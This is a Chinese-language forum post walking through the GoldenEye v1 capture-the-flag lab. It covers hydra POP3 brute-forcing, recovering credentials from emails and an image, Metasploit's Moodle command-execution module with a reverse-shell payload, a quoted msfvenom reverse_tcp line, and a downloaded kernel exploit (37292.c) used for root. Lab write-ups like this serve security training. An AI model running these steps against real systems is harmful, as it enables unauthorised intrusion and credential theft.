外链论坛

 找回密码
 立即注册
搜索
查看: 20|回复: 1

普通靶机1-GoldenEye-v1

[复制链接]

2832

主题

316

回帖

9191万

积分

论坛元老

Rank: 8Rank: 8

积分
91919718
发表于 2024-10-10 03:52:06 | 显示全部楼层 |阅读模式

1、配置网络

·VMWare的“虚拟网络编辑器”设置“NAT模式”

·虚拟机给的是“仅主机模式”,需要更改为NAT模式

·查看虚拟机MAC位置“虚拟机”->“设置”->“网络适配器”->“高级”->mac位置(局域网检测目的ip是不是找正确)

2、渗透

1探测ip

·netdiscover -r 192.168.153.0/24

·找到目的ip192.168.153.135

2、探测端口

·nmap -sS -sV -T5 -A 192.168.153.135

·发掘开放8025端口

·探测所有端口:nmap -p 0-65535 192.168.153.135

3、探测80端口网站并利用探测到的信息

·能够看到提示了目的目录:/sev-home/

·扫描目录(没找到什么有用的)

·查看页面源码(触及到的cssjs文件都点开瞧瞧

·得到下列内容

    Boris, make sure you update your default password.

    My sources say MI6 maybe planning to infiltrate.

    Be on the lookout for any suspicious network traffic....

    I encoded you p@ssword below...

   InvincibleHack3r

BTW Natalya says she can break your codes

  (密文自动被公众号解析了)

·得到用户BorisNatalya

    Boris保证你更新了默认秘码

    我的信息源自说军情六处可能计划渗透。

    警觉任何可疑的网络流量。。。。

    我在下面给你编码了p@sword。。。

    InvincibleHack3rhtml解码

  顺便说一句,Natalya说她能够破解你的秘码

·因此得到账户:Borisboris),InvincibleHack3rinvincibleHack3r

·测试得到正确账户:boris,InvincibleHack3r

·拜访目录并登录

·得到内容:

GOLDENEYE

GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)

Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.153.129 LPORT=4444 -f exe -o new.exe -i 5

·翻译

    金眼

    GoldenEye是一个绝密的苏联定向武器项目。因为您有拜访权限,您肯定持有绝密许可,有资格作为认证的GoldenEye网络运营商(GNO

    请发送电子邮件给合格的GNO主管,以接受在线GoldenEye操作员培训,作为GoldenEye系统的管理员

    记住,因为隐式安全非常有效,咱们已将pop3服务配置为在非常高的非默认端口上运行

    msfvenom-p窗口/仪表指针_反向tcp LHOST=192.168.153.129 LPORT=4444-f exe-o new.exe-i 5

·得知有pop3服务,按照前面的提示:有默认秘码,尝试暴力破解

hydra -L [可能的用户名txt] -P /usr/share/wordlists/fasttrack.txt 192.168.153.135 -s 55007 pop3 -vV  //-L文本 -l 是用户名 - p秘码 -vV 表示每一条线程

·爆破得到用户:boris/secret1Boris/secret1!,natalya/birdNatalya/bird

·登录查看pop3信箱

        list能够列举数量

        retr 1 //第1

·账户:boris/secret1

Boris, this is admin. You can electronically communicate to co-workers and students here. Im not going to scan emails for security risks because I trust you and the other admins here.

·账户:Boris/secret1

·账户:natalya/bird

·第1封邮件: 娜塔莉亚,请你停止破解鲍里斯的秘码另外,您是 GNO 培训主管。一旦学生被指定给你,我就会给你发电子邮 件。 另外,请重视可能的网络漏洞。咱们获悉,一个名为 Janus 的犯罪集团正在追捕 GoldenEye·账户:Natalya/bird

·第二封邮件:好的,Natalyn 我有一个新学生给你。因为这是一个新系统,倘若您看到任何配置问题,请告诉我或boris,尤其是它与安全相关的问题……即使不是,只需以“安全”为幌子输入……它就会 容易升级变更简单 好的,用户信用是:用户名:xenia 秘码:RCP90rulez!鲍里斯验证了她是一个有效的承包商,因此只需创建帐户好吗?倘若外边内部域的 URL:severnaya-station.com/gnocertdir **请务必编辑您的主机文件,由于一般在远程离线工作.... 因为您是 Linux 用户,因此呢只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。

·在第二封邮件看到了一个用户名秘码,此服务器域名和网站,还需求咱们在本地服务hosts中添加域名信息

        用户名:xenia

        秘码RCP90rulez!

        域:severnaya-station.com

        网址:severnaya-station.com/gnocertdir

·添加hosts信息

·ctrl+O保留ctrl+X退出编辑

·写入成功

·拜访urlsevernaya-station.com/gnocertdir,找到登录页面

·输入用户信息,而后进入,得到一个用户

·这儿的意思是:有一个用户,说不要再这儿信息,要去发邮件。说明这是一个邮件用户

·爆破doakDoak用户秘码

hydra -L doak -P /usr/share/wordlists/fasttrack.txt 192.168.153.135 -s 55007 pop3 -vV

·爆破出来秘码doakgoat,查看邮件

·得到一个新用户:dr_doak4England!

·运用新用户再次登录CMS

·得到一个路径:/dir007key/for-007.jpg(以及暗示管理员admin

·下载照片后,照片属性存在

·eFdpbnRlcjE5OTV4IQ== ,经过base64解码:xWinter1995x!应该是admin秘码

·运用admin登录CMS

·发掘有2.2.3,况且运用研发模块Moodle(用插件看(然则版本号)在首页最下面有框架信息)

3、getshell

·搜索框架对应的exp

·运用远程代码执行(RCE)漏洞利用

1msfconsole ---进入MSF框架攻击界面

2search moodle ---查询 moodle类型攻击的模块

3use 1 ---调用1 exploit/multi/http/moodle_cmd_exec调用攻击脚

4set username admin ---设置用户名:admin

5set password xWinter1995x! ---设置秘码xWinter1995x!

6set rhostssevernaya-station.com ---设置:rhosts severnaya-station.com

7set targeturi /gnocertdir ---设置目录: /gnocertdir

8set payload cmd/unix/reverse ---设置payloadcmd/unix/reverse

9set lhost 192.168.153.142 ---设置:lhost 192.168.153.142通常便是自己的主机

10exploit ----执行命令run

·这个exp默认运用4444端口(能够用options查看一下payload)

·因为运用的是powershell命令,因此修改(搜索查到的这儿又利用点)

·再次执行

·拿到shell

4、提权

·uname -a

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

·能够内核提权

·searchsploit 3.13.0#搜索exp(能够搜索ubuntu能够试试)

·cd /usr/share/exploitdb/exploits/linux/local

·cp 37292.c /root/桌面/ #复制exp

·编辑37292.c由于目的靶机gcc环境,能够运用cc编译)(行数表示ESC后,输入“:set number”)

·开启http服务,目的靶机下载代码(目的靶机能够先到/tmp目录再下载)

    cc -o exp 37292.c ---C语言的CC代码编译点c文件

    chmod +x exp ---添加执行权限

    ./exp ---点杠执行

    id ---查看日前权限

·发掘权限变成root

这个靶机能够在github上找,倘若没找到私信我





上一篇:在线cms识别|旁站|c段|信息泄密|工控|系统|物联网安全|cms漏洞扫描|端口扫描|待完善..
下一篇:红蓝对抗|常用攻防工具大全
回复

使用道具 举报

2940

主题

3万

回帖

9997万

积分

论坛元老

Rank: 8Rank: 8

积分
99979445
发表于 2024-10-31 09:04:53 | 显示全部楼层
“NB”(牛×的缩写,表示叹为观止)‌
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站点统计|Archiver|手机版|小黑屋|外链论坛 ( 非经营性网站 )|网站地图

GMT+8, 2024-11-18 03:19 , Processed in 0.117670 second(s), 21 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.